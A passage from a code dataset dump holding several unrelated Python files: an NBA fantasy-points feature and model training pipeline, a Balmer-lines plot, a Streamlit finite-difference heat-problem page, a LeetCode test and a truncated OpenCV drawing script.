default='/logmel_h')\n parser.add_argument(\"--val_feature_dir\", type=str, default='/logmel_h')\n 
parser.add_argument(\"--load_checkpoint_path\", default='')\n \n parser.add_argument(\"--load_checkpoint\", default=False)\n parser.add_argument(\"--chs\", type=int, default=1)\n parser.add_argument(\"--kernel_size\", type=int,default=3)\n parser.add_argument(\"--layer_depth\", default=[64,128,256,256])\n parser.add_argument(\"--exp_id\", type=str, default='1')\n parser.add_argument(\"--max_ckpt\", type=int, default=20)\n parser.add_argument(\"--snapshot\", type=int, default=5)\n\n parser.add_argument(\"--hidden_layer_size\", type=int, default=256)\n parser.add_argument(\"--num_hidden_layers\", type=int, default=1)\n parser.add_argument(\"--lr\", type=float, default=1e-3)\n parser.add_argument(\"--l2_reg\", type=float, default=1e-4)\n parser.add_argument(\"--batch_size\", type=int, default=64)\n parser.add_argument(\"--n_epochs\", type=int, default=50)\n# parser.add_argument(\"--patience\", type=int, default=20)\n parser.add_argument(\"--label_mode\", type=str, choices=[\"fine\", \"coarse\"],\n default='coarse')\n\n args = parser.parse_args()\n\n # save args to disk\n \n model_path = os.path.join(args.output_dir, 'exp'+args.exp_id)\n os.makedirs(model_path, exist_ok=True)\n kwarg_file = os.path.join(model_path, \"hyper_params.json\")\n with open(kwarg_file, 'w') as f:\n json.dump(vars(args), f, indent=2)\n\n train(annotation_path = args.annotation_path, \n taxonomy_path = args.taxonomy_path, \n train_feature_dir = args.train_feature_dir, \n val_feature_dir = args.val_feature_dir,\n output_dir = args.output_dir, \n load_checkpoint = args.load_checkpoint,\n load_checkpoint_path = args.load_checkpoint_path,\n exp_id = args.exp_id, label_mode = \"coarse\", \n batch_size = args.batch_size, n_epochs = args.n_epochs, \n kernel_size = args.kernel_size, layer_depth = args.layer_depth, \n chs = args.chs, max_ckpt = args.max_ckpt,\n lr = args.lr, hidden_layer_size = args.hidden_layer_size, \n snapshot = args.snapshot,\n num_hidden_layers = args.num_hidden_layers, \n standardize = True,\n timestamp = None)\n","repo_name":"JishengBai/dcase2020_task5","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":25091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25355188709","text":"# coding: utf-8\nimport pandas as pd\nimport numpy as np\nfrom patsy import dmatrices\nimport statsmodels.api as sm\nimport pickle\n#from datetime import datetime, timedelta\nimport datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport cnfg\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom collections import defaultdict\nfrom collections import OrderedDict\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom proj_elastic import InsertLogs\nfrom sklearn import ensemble\nfrom sklearn.preprocessing import scale\nfrom sklearn.metrics import mean_squared_error\n\n\n# In[2]:\nconfig = cnfg.load(\"/home/ubuntu/dfsharp/.rotoguru_config\")\nurl = config[\"url\"]\n\n\ndef daily_download():\n # read in the user and key from config file\n # read in daily update of season long box scores\n df = pd.read_csv(url, sep=':')\n\n # format date as index, reset and sort old to new\n df.index = [pd.to_datetime(str(x), format='%Y%m%d') for x in df.Date]\n df.reset_index(inplace=True)\n df = df.sort(['index', 'Team'], ascending=[1, 1])\n\n # cut off note row\n df = df[1:]\n # rename some columns\n df = df.rename(columns={'H/A': 'home', 'First Last': 'name', 'Team pts': 'team_pts',\n 'Opp pts': 'opp_pts', 'DK 
Sal': 'dk_sal', 'DK pos': 'dk_pos',\n 'DK Change': 'dk_change', 'GTime(ET)': 'gametime'})\n\n # only use these columns (for now)\n df = df[['index', 'GameID', 'gametime', 'name', 'Minutes', 'Start', 'active', 'DKP', 'Team', 'Opp',\n 'home', 'team_pts', 'opp_pts', 'dk_sal', 'dk_pos', 'dk_change', 'Stats', 'DoubleD']]\n\n # only train on players who played > 0 minutes (keep today's players in\n # frame)\n today = datetime.datetime.today()\n df = df[(df['active'] > 0) | (df['index'] == today.strftime('%Y%m%d'))]\n\n return(df)\n\n\n# In[3]:\n\ndef make_dvp(df):\n # create sportvu clusters\n cdf = pd.read_csv(\n '/home/ubuntu/dfsharp/sportvu_clusters.csv',\n sep='\\t',\n encoding='utf-16')\n df = df.merge(cdf[['Name', 'Cluster Position Off', 'Cluster Position Def']].drop_duplicates(\n subset=['Name']), how='left', left_on='name', right_on='Name')\n df['Cluster Position Off'] = df[\n 'Cluster Position Off'].fillna(df['dk_pos'])\n df['kpos'] = df['Cluster Position Off']\n return(df)\n\n\ndef add_pace(df):\n holl = pd.read_html('http://espn.go.com/nba/hollinger/teamstats')\n holl = holl[0][1:]\n holl.columns = holl.iloc[0]\n holl = holl.reindex(holl.index.drop(1))\n holl.set_value(3, 'TEAM', 'Oklahoma')\n # read in crosswalk\n teams = pd.read_csv('/home/ubuntu/dfsharp/team_crosswalk.csv', sep='\\t')\n\n holl = pd.merge(\n left=holl,\n right=teams,\n left_on='TEAM',\n right_on='team_city')\n holl['team'] = holl['team'].str.lower()\n # merge team stats into real\n holl = holl[['team', 'team_city', 'PACE', 'AST', 'TO', 'ORR',\n 'DRR', 'REBR', 'EFF FG%', 'TS%', 'OFF EFF', 'DEF EFF']]\n holl = holl.rename(columns={'OFF EFF': 'OFF_EFF', 'DEF EFF': 'DEF_EFF'})\n holl['PACE'] = pd.to_numeric(holl['PACE'])\n holl['OFF_EFF'] = pd.to_numeric(holl['OFF_EFF'])\n holl['DEF_EFF'] = pd.to_numeric(holl['DEF_EFF'])\n\n hero_pace = holl[['team', 'PACE', 'OFF_EFF']]\n villain_pace = holl[['team', 'PACE', 'DEF_EFF']]\n villain_pace = villain_pace.rename(columns={'PACE': 'PACE_OPP'})\n\n df = pd.merge(\n left=df,\n right=hero_pace,\n left_on='Team',\n right_on='team',\n how='left')\n df = pd.merge(\n left=df,\n right=villain_pace,\n left_on='Opp',\n right_on='team',\n how='left')\n df['pace_sum'] = df['PACE'] + df['PACE_OPP']\n\n return(df)\n\n# total active games per player\n\n\ndef active_games(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(350)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].active.sum()\n# avg minutes past 7 days\n\n\ndef min_avg_7_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(7)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# avg MPG when >0 past 90 days *used for dk/min\n\n\ndef min_avg_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# dk pts scored past 90 days * used for dk/min\n\n\ndef dk_avg_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DKP.mean()\n# pts scored by team past 90 days [deprecated]\n# def team_pts_90_days(x):\n# return df[(df['index'] >= x['index'] - pd.DateOffset(90)) & (df['index'] < x['index']) & (df['Team'] == x['Team'])]['team_pts'].mean()\n# pts allowed by opponent past 90 days\n\n\ndef opp_pts_90_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(90)) & (df['index']\n < x['index']) & (df['Opp'] == x['Opp'])]['team_pts'].mean()\n# draftkings standard deviation!\n\n\ndef dk_std_90_days(x):\n return 
df[(df['index'] >= x['index'] - pd.DateOffset(90)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DKP.std()\n# draftkings local MAX\n\n\ndef dk_max_30_days(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(30)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DKP.max()\n# create avg minutes when starting\n\n\ndef min_when_starting(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(150)) & (df['Start'] == 1)\n & (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# create avg minutes when starting\n\n\ndef min_when_bench(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(150)) & (df['Start'] == 0)\n & (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n\n\ndef starts_past_week(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].Start.sum()\n# if they're starting today, and they have <= 1 start in past 7 days, use\n# min_when_start instead\n\n\ndef adjust_minutes(row):\n if (row['Start'] == True) and (row['starts_past_week'] <= 1) and (\n row['min_when_start'] > row['min_3g_avg']):\n return(row['min_when_start'])\n else:\n return(row['min_3g_avg'])\n# create DKP allowed vs each position by team\n\n\ndef dvp(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(180)) & (df['index'] <\n x['index']) & (df['Opp'] == x['Opp']) & (df['kpos'] == x['kpos'])]['DKP'].mean()\n# minutes yesterday\n\n\ndef min_yest(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(1)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].Minutes.mean()\n# create back to back boolean\n\n\ndef create_b2b_bool(row):\n if row['min_yest'] > 30:\n return(1)\n else:\n return(0)\n# 1) need Team MP, Team FGA, team FTA, team TOV for usage\n\n\ndef team_mp(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['Minutes'].sum()\n\n\ndef team_fga(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['fga'].sum()\n\n\ndef team_fta(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['fta'].sum()\n\n\ndef team_tov(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team'])]['tov'].sum()\n# USAGE: 100 * ((FGA + 0.44 * FTA + TOV) * (Tm MP / 5)) / (MP * (Tm FGA +\n# 0.44 * Tm FTA + Tm TOV)).\n\n\ndef usage(x):\n try:\n usage = 100 * ((x['fga'] + 0.44 * x['fta'] + x['tov']) * (x['team_mp'] / 5)) / (\n x['Minutes'] * (x['team_fga'] + 0.44 * x['team_fta'] + x['team_tov']))\n except ZeroDivisionError:\n usage = 0\n if (usage > 50):\n usage = 50\n return(usage)\n\n\ndef usage_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].usage.mean()\n\n\ndef usage_5g_avg(x):\n return df[(df['gp'] >= x['gp'] - 5) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].usage.mean()\n# historical value\n\n\ndef value(x):\n val = x['DKP'] / (x['dk_sal'] / 1000)\n return(val)\n\n\ndef value_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].value.mean()\n\n\ndef min_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].Minutes.mean()\n\n\ndef starter_min(x):\n return df[(df['index'] == x['index']) & (\n df['Team'] == x['Team']) & df['Start'] == 1].Minutes.mean()\n\n\ndef starter_5g_avg(x):\n return df[(df['gp'] >= x['gp'] - 5) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].starter_min.mean()\n# minutes vs starters 5 game average\n\n\ndef mvs_5g_avg(x):\n return df[(df['gp'] 
>= x['gp'] - 5) & (df['gp'] < x['gp']) &\n (df['name'] == x['name'])].min_vs_starters.mean()\n# add up their total double doubles\n\n\ndef dbl_dbl(x):\n return df[(df['index'] >= x['index'] - pd.DateOffset(350)) &\n (df['index'] < x['index']) & (df['name'] == x['name'])].DoubleD.sum()\n# 3game avg of FGA\n\n\ndef fga_3g_avg(x):\n return df[(df['gp'] >= x['gp'] - 3) & (df['gp'] < x['gp'])\n & (df['name'] == x['name'])].fga.mean()\n'''\nadd_stats- adds stats\n input: dataframe sorted ascending by dates\n outputs: same frame with added stat columns\n'''\n\n\ndef add_stats(df):\n\n df['gp'] = df.apply(active_games, axis=1)\n df['min_3g_avg'] = df.apply(min_3g_avg, axis=1)\n\n #df['min_7d_avg'] = df.apply(min_avg_7_days, axis=1)\n df['min_90d_avg'] = df.apply(min_avg_90_days, axis=1)\n df['dk_avg_90_days'] = df.apply(dk_avg_90_days, axis=1)\n # df['teampts_avg'] = df.apply(team_pts_90_days, axis=1)\n # df['opppts_avg'] = df.apply(opp_pts_90_days, axis=1)\n df['dk_per_min'] = df['dk_avg_90_days'] / df['min_90d_avg']\n # transform DK points to more normal distro\n df['DKP_trans'] = df['DKP']**.5\n # create columns for - positive DK change; negative DK change\n # df['dk_sal_increase'] = np.where((df['dk_change'] > 0), True, False)\n # df['dk_sal_decrease'] = np.where((df['dk_change'] < 0), True, False)\n # create standard dev and max columns\n df['dk_std_90_days'] = df.apply(dk_std_90_days, axis=1)\n df['dk_max_30_days'] = df.apply(dk_max_30_days, axis=1)\n # get min when starting / bench\n df['min_when_start'] = df.apply(min_when_starting, axis=1)\n df['min_when_bench'] = df.apply(min_when_bench, axis=1)\n # count games started in past week\n df['starts_past_week'] = df.apply(starts_past_week, axis=1)\n # adjust minutes\n df['min_proj'] = df.apply(adjust_minutes, axis=1)\n # add dvp\n df['dvp'] = df.apply(dvp, axis=1)\n # add dvp rank\n df['dvprank'] = pd.qcut(\n df['dvp'], [\n 0.05, 0.1, 0.25, 0.5, 0.75, .93, 1], labels=False)\n # combine PACE and dvp\n df['pace_dvp'] = (df['pace_sum'] / 10) + df['dvp']\n\n # create summary stats\n df['pts'] = df['Stats'].str.extract('(\\d*)pt')\n df['rbs'] = df['Stats'].str.extract('(\\d*)rb')\n df['stl'] = df['Stats'].str.extract('(\\d*)st')\n df['ast'] = df['Stats'].str.extract('(\\d*)as')\n df['blk'] = df['Stats'].str.extract('(\\d*)bl')\n df['3pm'] = df['Stats'].str.extract('(\\d*)trey')\n df['fgm'] = df['Stats'].str.extract('(\\d*)-\\d*fg')\n df['fga'] = df['Stats'].str.extract('\\d*-(\\d*)fg')\n df['ftm'] = df['Stats'].str.extract('(\\d*)-\\d*ft')\n df['fta'] = df['Stats'].str.extract('\\d*-(\\d*)ft')\n df['tov'] = df['Stats'].str.extract('(\\d*)to')\n df[['pts',\n 'rbs',\n 'stl',\n 'ast',\n 'blk',\n '3pm',\n 'fgm',\n 'fga',\n 'ftm',\n 'fta',\n 'tov']] = df[['pts',\n 'rbs',\n 'stl',\n 'ast',\n 'blk',\n '3pm',\n 'fgm',\n 'fga',\n 'ftm',\n 'fta',\n 'tov']].apply(lambda x: pd.to_numeric(x,\n errors='coerce'))\n df[['pts', 'rbs', 'stl', 'ast', 'blk', '3pm', 'fgm',\n 'fga', 'ftm', 'fta', 'tov']].fillna(0, inplace=True)\n\n # add yesterdays minutes\n df['min_yest'] = df.apply(min_yest, axis=1)\n # create back to back boolean column [over 30 minutes played the prior day]\n df['b2b'] = df.apply(create_b2b_bool, axis=1)\n\n # fillna just in case\n df['Minutes'] = df['Minutes'].fillna(value=0)\n df['fga'] = df['fga'].fillna(value=0)\n df['fta'] = df['fta'].fillna(value=0)\n df['tov'] = df['tov'].fillna(value=0)\n\n # add team stats for usage calc\n df['team_mp'] = df.apply(team_mp, axis=1)\n df['team_fga'] = df.apply(team_fga, axis=1)\n df['team_fta'] = 
df.apply(team_fta, axis=1)\n df['team_tov'] = df.apply(team_tov, axis=1)\n\n # add individual usage / 3 game rolling avg\n df['usage'] = df.apply(usage, axis=1)\n df['usage_3g_avg'] = df.apply(usage_3g_avg, axis=1)\n df['usage_5g_avg'] = df.apply(usage_5g_avg, axis=1)\n\n # add value / 3 game rolling avg for val\n df['value'] = df.apply(value, axis=1)\n df['value_3g_avg'] = df.apply(value_3g_avg, axis=1)\n\n # add starter min - average minutes played of all the starters\n df['starter_min'] = df.apply(starter_min, axis=1)\n\n # add game by game minutes vs starter average\n df['min_vs_starters'] = df['Minutes'] - df['starter_min']\n df['mvs_5g_avg'] = df.apply(mvs_5g_avg, axis=1)\n\n # add 3game average of starter minutes\n df['starter_5g_avg'] = df.apply(starter_5g_avg, axis=1)\n\n # add rolling avg of fga\n df['fga_3g_avg'] = df.apply(fga_3g_avg, axis=1)\n\n # add double double count\n df['dbl_dbl_cnt'] = df.apply(dbl_dbl, axis=1)\n # create \"double double per game\" stat\n df['dbl_dbl_per_game'] = df['dbl_dbl_cnt'] / df['gp']\n # combo stat: Minutes + FGA + dbl_dbl_per_game\n df['combo'] = df['min_proj'] + df['dbl_dbl_per_game'] + df['fga_3g_avg']\n\n return(df)\n\n''' train_model - trains linear regression on given df\n inputs: df - dataframe to train on\n num - num to start slice at\n outputs: fitted model\n side-effects: prints summary statistics\n pickles model\n'''\n\n\ndef train_save_model(df, num=0, num2=20000):\n # train on most recent 30 days?\n #train = df[num:num2].dropna(subset=['DKP_trans','Start','dk_avg_90_days','home','dvp','usage_5g_avg','min_proj'])\n train = df[\n num:num2].dropna(\n subset=[\n 'DKP',\n 'Start',\n 'dk_per_min',\n 'dvprank',\n 'pace_sum',\n 'min_proj',\n 'home'])\n Y_train, X_train = dmatrices('''DKP ~ Start + dk_per_min + dvprank + pace_sum + min_proj + home\n ''', data=train, return_type='dataframe')\n\n model = sm.OLS(Y_train, X_train)\n results = model.fit()\n print(results.summary())\n path = '/home/ubuntu/dfsharp/latest_model1.p'\n pickle.dump(results, open(path, \"wb\"))\n return(results)\n\n\ndef train_save_booster(df, num=0, num2=20000):\n # Load data\n df = df[num:num2].dropna(\n subset=[\n 'DKP',\n 'Start',\n 'dk_per_min',\n 'dvprank',\n 'pace_sum',\n 'min_proj',\n 'home'])\n\n #X = scale(df[['Start','dk_per_min','pace_dvp','combo']])\n df['home'] = df['home'].map({'H': 1.0, 'A': 0.0})\n X = scale(df[['Start', 'dk_per_min', 'dvprank',\n 'pace_sum', 'min_proj', 'home']])\n X = X.astype(np.float32)\n y = df['DKP']\n\n # Fit regression model\n params = {'n_estimators': 450, 'max_depth': 2, 'min_samples_split': 5, 'min_samples_leaf': 4, 'max_features': 0.3,\n 'learning_rate': 0.1, 'loss': 'ls'}\n clf = ensemble.GradientBoostingRegressor(**params)\n\n clf.fit(X, y)\n print(clf.score(X, y))\n path = '/home/ubuntu/dfsharp/latest_model.p'\n pickle.dump(clf, open(path, \"wb\"))\n return(clf)\n\n# '''\n# A) daily download\ndf = daily_download()\n\n# B) create DVP\ndf = make_dvp(df)\n\n# C) add pace\ndf = add_pace(df)\n\n# D) add stats\ndf = add_stats(df)\n# (optional) skip stat creation and load latest gamelogs df\n#df = pd.read_csv('/home/ubuntu/dfsharp/gamelogs.csv')\nprint(len(df))\ndf.Date = df['GameID'].str[:8]\n\n# E) pull out todays frame\ntoday = datetime.datetime.today() - datetime.timedelta(hours=4)\n#todays_players = df[df['index'] == today.strftime('%Y%m%d')]\ntodays_players = df[df.Date == today.strftime('%Y%m%d')]\n\nprint(len(todays_players))\n\n\ncsvpath = '/home/ubuntu/dfsharp/csvs/' + \\\n today.strftime('%Y%m%d') + 
'_players.csv'\ntodays_players.to_csv(csvpath)\n# F) insert gamelogs into elasticsearch, save to CSV\nnot_today = df[df['index'] != today.strftime('%Y%m%d')]\nnot_today.to_csv('gamelogs.csv')\nInsertLogs(not_today, indexer=\"gamelogs\")\n\n# '''\n# optional\n# df = pd.read_csv('/home/ubuntu/dfsharp/gamelogs.csv')\n# G) remove outliers for model training\ndf = df[df['dvp'] < 29]\ndf = df[df['dvp'] > 12]\ndf = df[df['dk_avg_90_days'] > 0]\ndf = df[df['Minutes'] > 1]\n#df = df[df['fga'] > 0]\n\n\n# H) train and save the model\nyo = train_save_booster(df, 5000, 20000)\nreg = train_save_model(df, 5000, 20000)\n","repo_name":"shermanash/DFSharp","sub_path":"generate_model.py","file_name":"generate_model.py","file_ext":"py","file_size_in_byte":17355,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"1307207495","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport fractions\nimport balmer_lines_a as a\nimport balmer_lines_b as b\n\ntemp = np.linspace(0,30000,100)\ny = []\n\nfor t in temp:\n boltzmann = a.boltzmann(t)\n fraction = fractions.Fraction(boltzmann)\n fraction = str(fraction).split('/')\n if len(fraction) > 1:\n n_s2 = int(fraction[0])\n total = int(fraction[0]) + int(fraction[1])\n # n_s2/(n_s1 + n_s2)\n else:\n y.append(0)\n continue\n \n saha = b.saha(t)\n fraction_saha = fractions.Fraction(saha)\n fraction_saha = str(fraction_saha).split('/')\n if len(fraction_saha) > 1:\n total = int(fraction_saha[0]) + int(fraction_saha[1])\n n_H0 = int(fraction_saha[1])\n n_Hplus = int(fraction_saha[0])\n n_H = total\n else:\n y.append(1)\n continue\n\n y.append((n_H0 * n_s2) / (n_H * 10**17))\n\nfig, ax = plt.subplots()\n\nax.plot(temp,y, '.')\nax.set_xlabel('Temperatur [K]')\nax.set_ylabel('Combined density')\n\nplt.show()","repo_name":"LenaMesserschmidt/astro-gk","sub_path":"task3/balmer_lines_c.py","file_name":"balmer_lines_c.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21543507132","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\nimport streamlit as st\nimport time\nfrom exact import T\nimport streamlit.components.v1 as components\n\ndef form_grid_data():\n with st.form(key=\"grid_data\"):\n st.header('Параметры сетки')\n dx = st.number_input('Шаг сетки по пространству, м', value=1)\n dt = st.number_input('Шаг сетки по времени, дни', value=1)\n #t = 0\n #time_interval = []\n zbf = []\n #res = []\n # Hbf = st.metric(\"Глубина промерзания, м\", value=zbf)\n if 'zbf' not in st.session_state:\n st.session_state.zbf=zbf\n T_end = st.number_input('Время окончания расчета, дни', value=st.session_state.problem['T_end'])\n submitted = st.form_submit_button('Расчитать')\n if 'my_bar' not in st.session_state:\n st.session_state.my_bar = st.progress(0)\n if 'placeholder' not in st.session_state:\n st.session_state.placeholder = st.empty()\n if 'sol_plot' not in st.session_state:\n st.session_state.sol_plot = st.empty()\n # st.header(\"Результаты\")\n if submitted:\n st.session_state.my_bar.progress(0)\n dt *= 86400\n T_end *= 86400\n st.session_state.zbf, st.session_state.res = exact_solution(dx, dt, T_end=T_end)\n # print(f'zbf={st.session_state.zbf}')\n\ndef description():\n col1, col2 = st.columns([3,2])\n with col1:\n st.latex(r'''\n c_i \\frac{T_i^{j+1} - T_i^j}{\\tau} = \\frac{1}{h^2} \\left( a_{i+1/2} \\left( T_{i+1}^j - T_{i}^j 
\\right) - a_{i-1/2} \\left( T_{i}^j - T_{i-1}^j \\right) \\right),\n ''')\n st.latex(r'''\n c_i = C_{\\mathrm{eff}}(T_{i}^j), \\quad\n a_{i+1/2} = 0.5 (\\lambda(T_{i+1}^j) + \\lambda(T_{i}^j)),\n ''')\n st.latex(r'''\n T_i^0 = T_0, \\quad\n i = 1, 2, \\ldots, N-1,\n ''')\n st.latex(r'''\n T_0^{j+1} = T_{\\mathrm{bnd}}, \\quad\n a_{N+1/2} \\frac{T_{N+1}^{j} - T_{N-1}^{j}}{h} = 0,\\quad j = 0, 1, \\ldots, M,\n ''')\n st.write('Выражаем значение на следующем временном шаге $T_i^{n+1}$')\n st.latex(r'''\n T_i^{j+1} = T_i^j + \\frac{\\tau}{c_i h^2} \\left( a_{i+1/2} \\left( T_{i+1}^j - T_{i}^j \\right) - a_{i-1/2} \\left( T_{i}^j - T_{i-1}^j \\right) \\right), \\quad i = 1, 2, \\ldots, N-1,\n ''')\n #\n st.latex(r'''\n T_0^{j+1} = T_{\\mathrm{bnd}}, \\quad\n T_N^{j+1} = T_N^j - \\frac{\\tau}{c_N h^2} \\left( \\lambda(T_{N-1}^j) \\left( T_{N-1}^j - T_{N}^j \\right) \\right), \n ''')\n with col2:\n st.image('./imgs/time-space-grid.png')\n\ndef exact_solution(dx, dt, T_end=20):\n st.session_state.my_bar.progress(0)\n z = np.linspace(0, st.session_state.problem['H'], int(st.session_state.problem['H']/dx)+1)\n t = 0\n time_interval = [0]\n zbfs = [0]\n res = [T(z,0)]\n fig, ax = plt.subplots(figsize=(3,1.5))\n ax.set_xlabel('Глубина, м')\n ax.set_ylabel('Температура, К')\n plotLine, = ax.plot(z, res[0][1])\n plotTitle = ax.set_title('t = 0')\n line = go.Scatter(x=z.flatten(), y=res[0][1])\n frames = []\n # with st.session_state.sol_plot.container():\n # st.pyplot(fig)\n day=0\n rem_t = float(T_end)\n while t < T_end:\n rem_t = T_end - t\n dt = dt if rem_t > dt else rem_t\n t += dt\n day = int(t/86400)\n u = np.zeros_like(z)\n zbf, u = T(z, t)\n time_interval.append(t)\n zbfs.append(zbf)\n# time.sleep(0.05)\n with st.session_state.placeholder.container():\n st.header('Результаты')\n col1, col2 = st.columns(2)\n with col1:\n st.metric(\n label='День',\n value=day)\n st.metric(\n label='Глубина промерзания, м',\n value=zbf\n )\n with col2:\n with st.session_state.sol_plot.container():\n line = go.Scatter(x=z.flatten(), y=u)\n\n button = {\n \"type\": \"buttons\",\n \"buttons\": [\n {\n \"label\": \"Просмотр\",\n \"method\": \"animate\",\n \"args\": [None, {\"frame\": {\"duration\": 20}}],\n }\n ]\n }\n layout = go.Layout(updatemenus=[button],\n title_text=f'{t/86400} день'\n )\n\n frame = go.Frame(\n data = [line],\n layout = go.Layout(title_text=f'{t/86400} день')\n )\n\n frames.append(frame)\n\n fig = go.Figure(data=[line], frames=frames, layout=layout)\n st.plotly_chart(fig, use_container_width=True)\n # plotLine.set_ydata(u)\n# plotTitle.set_text(f'{t/86400} день')\n# # components.html(fig_html, height=300)\n# st.pyplot(fig)\n\n \n res.append(u)\n st.session_state.my_bar.progress(t/T_end)\n return zbfs, res\n\ndef ds_page():\n #print(f'session_state_here={st.session_state}')\n st.title('Разностная схема')\n #print(f'problem={st.session_state.problem.prm},\\n soil={st.session_state.Soil.prm}')\n description()\n form_grid_data()\n# print(f'session_state_and_here={st.session_state}')\n# form_viz_data()\n\n","repo_name":"slemeshevsky/stefan","sub_path":"ds_page.py","file_name":"ds_page.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878551456","text":"from unittest import TestCase\n\nfrom leetcodepy.binary_tree_level_order_traversal_ii import *\nfrom leetcodepy.utils import trees\n\nSOLUTION1 = Solution1()\nSOLUTION2 = Solution2()\n\nROOT1 = trees.from_values(3, 9, 20, None, None, 15, 
7)\nEXPECTED1 = [\n [15, 7],\n [9, 20],\n [3]\n]\n\nROOT2 = trees.from_values(1)\nEXPECTED2 = [[1]]\n\nROOT3 = trees.from_values()\nEXPECTED3 = []\n\n\nclass TestBinaryTreeLevelOrderTraversalII(TestCase):\n def test1(self):\n self.assertListEqual(EXPECTED1, SOLUTION1.levelOrderBottom(ROOT1))\n self.assertListEqual(EXPECTED2, SOLUTION1.levelOrderBottom(ROOT2))\n self.assertListEqual(EXPECTED3, SOLUTION1.levelOrderBottom(ROOT3))\n\n def test2(self):\n self.assertListEqual(EXPECTED1, SOLUTION2.levelOrderBottom(ROOT1))\n self.assertListEqual(EXPECTED2, SOLUTION2.levelOrderBottom(ROOT2))\n self.assertListEqual(EXPECTED3, SOLUTION2.levelOrderBottom(ROOT3))\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/tests/test_binary_tree_level_order_traversal_ii.py","file_name":"test_binary_tree_level_order_traversal_ii.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39333628451","text":"import cv2 as cv\nimport numpy as np\nimport random\nimport copy\n\ndef carBody(arr, img):\n cv.rectangle(img, arr, arr, (255,255,255), 5)\n return img\n\ndef dtCollisionBoundaries(arr):\n if (arr[0] <= 45):\n return True\n if (arr[1] <= 75) or (arr[1] >= 475):\n return True\n return False\n\ndef dtDestination(arr):\n if (arr[0] >= 835):\n return True\n return False\n\ndef getDisplay(arr):\n img = np.zeros((512, 900, 3), dtype=\"uint8\")\n img = carBody(arr, img)\n boundaryPts = np.array([[40, 70], [40, 470],\n [840, 470], [840, 70]],\n np.int32)\n boundaryPts = boundaryPts.reshape((-1, 1, 2))\n\n destPts = np.array([[840, 470], [840, 70]],\n np.int32)\n destPts = destPts.reshape((-1, 1, 2))\n\n hindPts1 = np.array([[194, 474], [194, 304]],\n np.int32)\n hindPts1 = hindPts1.reshape((-1, 1, 2))\n\n hindPts2 = np.array([[408, 474], [408, 304]],\n np.int32)\n hindPts2 = hindPts2.reshape((-1, 1, 2))\n\n hindPts3 = np.array([[682, 474], [682, 304]],\n np.int32)\n hindPts3 = hindPts3.reshape((-1, 1, 2))\n\n hindPts4 = np.array([[281, 69], [281, 231]],\n np.int32)\n hindPts4 = hindPts4.reshape((-1, 1, 2))\n\n hindPts5 = np.array([[541, 69], [541, 231]],\n np.int32)\n hindPts5 = hindPts5.reshape((-1, 1, 2))\n\n isClosed = True\n thickness = 8\n img = cv.polylines(img, [boundaryPts],\n isClosed, (0, 255, 0),\n thickness)\n img = cv.polylines(img, [destPts],\n isClosed, (0, 0, 255),\n thickness)\n img = cv.polylines(img, [hindPts1],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts2],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts3],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts4],\n isClosed, (120, 120, 0),\n thickness)\n img = cv.polylines(img, [hindPts5],\n isClosed, (120, 120, 0),\n thickness)\n return img\n\ndef collisionWithHind(arr):\n #[194, 474], [194, 304]\n if (190 <= arr[0] <= 199) and (304 <= arr[1] <= 474):\n return True\n\n #[408, 474], [408, 304]\n if ((408-5) <= arr[0] <= (408+5)) and (304 <= arr[1] <= 